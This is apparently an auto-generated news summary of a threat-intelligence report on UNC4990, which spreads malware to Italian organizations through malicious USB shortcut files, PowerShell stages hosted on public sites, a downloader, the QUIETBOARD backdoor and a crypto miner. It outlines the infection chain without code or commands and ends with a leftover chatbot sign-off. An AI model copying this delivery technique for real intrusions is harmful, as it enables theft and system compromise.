January 31, 2024 at 06:22AM
UNC4990, a financially motivated threat actor, is using weaponized USB devices to infect organizations in Italy. The attacks target various industries and involve utilizing third-party websites to host and download additional stages of the attack. UNC4990 operates out of Italy and has been active since late 2020. The end goal of the threat actor is unclear, but their activities include deploying an open-source cryptocurrency miner. Multiple variants of malware have been identified, including a backdoor called QUIETBOARD with extensive capabilities.
Key Takeaways from Newsroom Meeting Notes:
– UNC4990, a financially motivated threat actor, utilizes weaponized USB devices as an initial infection vector to target organizations in Italy.
– Mandiant reported that the attacks target multiple industries such as health, transportation, construction, and logistics.
– The attacker leverages third-party websites like GitHub, Vimeo, and Ars Technica to host encoded additional stages, which are downloaded and decoded via PowerShell.
– The threat actor is assessed to be operating out of Italy based on the extensive use of Italian infrastructure for command-and-control (C2) purposes.
– It’s unclear whether UNC4990 functions solely as an initial access facilitator for other actors, and their end goal is not clear.
– Fortgale and Yoroi previously documented details of the campaign, identifying UNC4990 in different ways, such as Nebula Broker.
– The infection begins with the victim double-clicking on a malicious LNK shortcut file on a removable USB device, leading to the execution of a PowerShell script responsible for downloading EMPTYSPACE from a remote server via another PowerShell script hosted on Vimeo.
– The backdoor QUIETBOARD is a Python-based malware with a wide range of features, including executing arbitrary commands, altering crypto wallet addresses, taking screenshots, and gathering system information.
– The threat actors demonstrate adaptability and a modular approach in developing their toolset, utilizing multiple programming languages and showing a predisposition for experimentation.
– The use of popular sites like Ars Technica, GitHub, and Vimeo for hosting the malicious payload poses no direct risk to everyday users as the content hosted in isolation is benign.
Let me know if you need any additional details or if there’s anything else I can assist you with.